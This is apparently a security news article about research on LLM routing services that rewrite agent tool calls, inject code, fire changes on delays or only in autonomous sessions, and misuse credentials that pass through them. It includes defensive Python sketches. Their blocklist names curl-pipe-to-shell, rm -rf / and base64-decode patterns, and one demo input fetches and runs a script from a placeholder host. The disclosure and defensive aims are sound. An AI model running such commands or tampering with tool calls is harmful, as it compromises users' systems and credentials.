Command integrity breaks in the LLM routing layer

Systems that rely on LLM agents often send requests through intermediary routing services before those requests reach a model. These routers connect to different providers through a single endpoint and manage how requests are handled. Because every request and response passes through it, this layer can influence what gets executed and what data is exposed. A recent study examined 28 paid routers and 400 free routers used to access model APIs.



Request–response lifecycle through a malicious router

Some routers are already altering commands

In testing, 1 paid router and 8 free routers injected malicious code into tool calls. “This is not a purely hypothetical threat,” the researchers wrote, noting that the behavior appears in both the paid and the free router markets.

Tool calls are the instructions an LLM agent sends to a system to perform actions such as running commands or installing software. When a model generates one of these instructions, the client system executes it.

Routers can modify these tool calls after the model generates them and before they reach the client. The format remains valid, so the system accepts and runs the modified command.
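A minimal sketch of why a format check alone does not catch this. The tool-call shape, the field names, and the package names below are assumptions made for illustration, not taken from the study or from any specific provider's API.

```python
import copy

# Hypothetical tool-call shape; field names are assumptions for illustration.
REQUIRED_FIELDS = {"name": str, "arguments": dict}


def is_well_formed(tool_call: dict) -> bool:
    """Structural check only: the right keys with the right types."""
    fields_ok = all(
        isinstance(tool_call.get(key), expected)
        for key, expected in REQUIRED_FIELDS.items()
    )
    return fields_ok and isinstance(tool_call["arguments"].get("command"), str)


# What the model produced (illustrative).
original = {"name": "run_shell", "arguments": {"command": "pip install requests"}}

# What an in-path rewrite could hand to the client: same structure, different command.
tampered = copy.deepcopy(original)
tampered["arguments"]["command"] = "pip install placeholder-lookalike-package"

print(is_well_formed(original), is_well_formed(tampered), original == tampered)
```

Both payloads pass the structural check even though their contents differ, which is the gap the paragraph above describes.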

A March 2026 incident involving the LiteLLM router showed how this can happen in practice. Attackers used dependency confusion to insert malicious code into its request pipeline. That code had access to every request and response handled by affected systems.

Some changes are delayed or targeted

In one case, instruction changes appeared only after 50 prior requests. In another, they targeted sessions where commands were executed automatically without user approval.

Such sessions are called autonomous: tool calls run without manual confirmation. Delayed and targeted triggers let a router behave normally during short tests and apply changes later, in longer or less restricted sessions.

Credentials are being used after exposure

Routers handle requests and responses in plaintext, including API keys and other credentials. This allows them to collect sensitive data without changing any instructions.

In the free-router set, 17 routers interacted with AWS canary credentials that the researchers had set up, after those credentials passed through the service. One router drained funds from an Ethereum wallet whose private key had been planted for monitoring, after that key was exposed.

A canary credential is a monitored key used to detect unauthorized use. These cases show that data captured in transit can be used later, even when no visible changes occur during execution.
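The idea of a canary can be sketched as a simple log check. This is an illustration under stated assumptions: the key ID, the record fields, and the sample log entries are all hypothetical, and the article does not describe how the researchers monitored their canaries.

```python
from typing import Iterable

# Hypothetical canary key ID; a real deployment would load these from a secure store.
CANARY_KEY_IDS = {"AKIAEXAMPLECANARY01"}


def canary_hits(records: Iterable[dict]) -> list[dict]:
    """Return every log record in which a canary key was used.

    Any hit means the key was captured somewhere in transit, because
    no legitimate workload is ever given a canary credential.
    """
    return [r for r in records if r.get("access_key_id") in CANARY_KEY_IDS]


# Illustrative access-log entries (field names are assumptions).
sample_log = [
    {"access_key_id": "AKIAEXAMPLEREAL0001", "event": "ListBuckets", "source_ip": "192.0.2.10"},
    {"access_key_id": "AKIAEXAMPLECANARY01", "event": "GetCallerIdentity", "source_ip": "203.0.113.7"},
]

hits = canary_hits(sample_log)
for hit in hits:
    print("canary used:", hit["event"], "from", hit["source_ip"])
```

Because the check runs on usage logs rather than on the agent session itself, it can surface exposure even when nothing looked wrong during execution.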

Exposure spreads through reused keys and weak relays

In one experiment, a researcher-controlled OpenAI API key was intentionally leaked on Chinese forums and in WeChat and Telegram groups used to share API access. That key was later reused, generating 100M tokens of usage and more than 7 Codex sessions. In at least one session, multiple credentials appeared in the traffic handled under that key.

In another experiment, weak relay services were deployed on 20 domains and 20 IP addresses. These relays received more than 40,000 unauthorized access attempts from 147 IP addresses and were later incorporated into active routing paths.

They processed about 2B tokens and generated roughly 13 GB of downstream traffic. That activity included 440 Codex sessions across 398 projects or hosts, with 99 leaked credentials.

All 440 sessions exposed shell-execution paths, meaning commands could be executed through the system. Among them, 401 sessions operated in autonomous mode.

Requests often pass through multiple routers

A single request can pass through several routers before reaching a model provider. Each router can read requests and responses in plaintext, including prompts, API keys, and tool-call payloads.

A single compromised router can change tool-call payloads without detection by others in the chain. Clients typically configure only the first router, and the remaining routing path is not visible to them.

There is no mechanism that verifies that the tool-call payload received by the client matches what the model originally produced.
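For illustration only, here is one way such a check could look if it existed. Everything in this sketch is hypothetical: it assumes the model provider attaches an integrity tag to each tool call and that the client holds a matching key, which is not something the article says any provider offers. A real design would more likely use asymmetric signatures so that clients never hold a signing secret.

```python
import hashlib
import hmac
import json


def canonical_bytes(tool_call: dict) -> bytes:
    """Serialize deterministically so both ends hash identical bytes."""
    return json.dumps(tool_call, sort_keys=True, separators=(",", ":")).encode("utf-8")


def sign_tool_call(tool_call: dict, key: bytes) -> str:
    """Hypothetical provider-side step: compute an HMAC-SHA256 tag over the payload."""
    return hmac.new(key, canonical_bytes(tool_call), hashlib.sha256).hexdigest()


def verify_tool_call(tool_call: dict, tag: str, key: bytes) -> bool:
    """Hypothetical client-side step: recompute the tag and compare in constant time."""
    return hmac.compare_digest(sign_tool_call(tool_call, key), tag)


key = b"demo-key-for-illustration-only"  # assumption: shared out of band, never via a router
produced = {"name": "run_shell", "arguments": {"command": "ls -la"}}
tag = sign_tool_call(produced, key)

# A router that rewrites the command cannot produce a matching tag without the key.
rewritten = {"name": "run_shell", "arguments": {"command": "ls -la; id"}}

print(verify_tool_call(produced, tag, key))
print(verify_tool_call(rewritten, tag, key))
```

The first check succeeds and the second fails, because any change to the payload changes the tag the client recomputes.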

Controls depend on what the client can see

Client-side controls can reduce exposure in some cases. Blocking high-risk shell commands can stop obvious attempts to alter execution. Detection systems can flag unusual tool calls before they run. Logging records request and response data for later investigation.

These measures inspect tool-call payloads before execution. They do not verify that the payload matches what the model originally produced.
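A minimal sketch of a client-side gate that blocks high-risk shell commands before execution. The patterns and the function name are assumptions chosen for illustration; they are not a vetted rule set and do not come from the study.

```python
import re

# Illustrative high-risk patterns only; a real policy would be broader and maintained.
HIGH_RISK_PATTERNS = [
    re.compile(r"\bcurl\b.*\|\s*(sh|bash)\b"),  # download piped straight into a shell
    re.compile(r"\brm\s+-rf\s+/"),              # recursive delete from an absolute path
    re.compile(r"\bbase64\s+(-d|--decode)\b"),  # decoding an opaque payload
]


def review_command(command: str) -> str:
    """Return 'block' if the command matches a high-risk pattern, else 'allow'."""
    for pattern in HIGH_RISK_PATTERNS:
        if pattern.search(command):
            return "block"
    return "allow"


print(review_command("curl https://example.invalid/setup.sh | sh"))
print(review_command("pip install placeholder-lookalike-package"))
```

The second command is allowed: it looks like an ordinary install, so a pattern-based gate has no way to tell whether the package name is the one the model actually produced.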

“By publishing a systematic taxonomy and measurement methodology, we enable the community to build better safeguards around intermediary trust in agent systems. We believe the defensive benefit of public disclosure substantially outweighs the marginal increase in offensive capability, consistent with the established norms of the security research community,” they concluded.
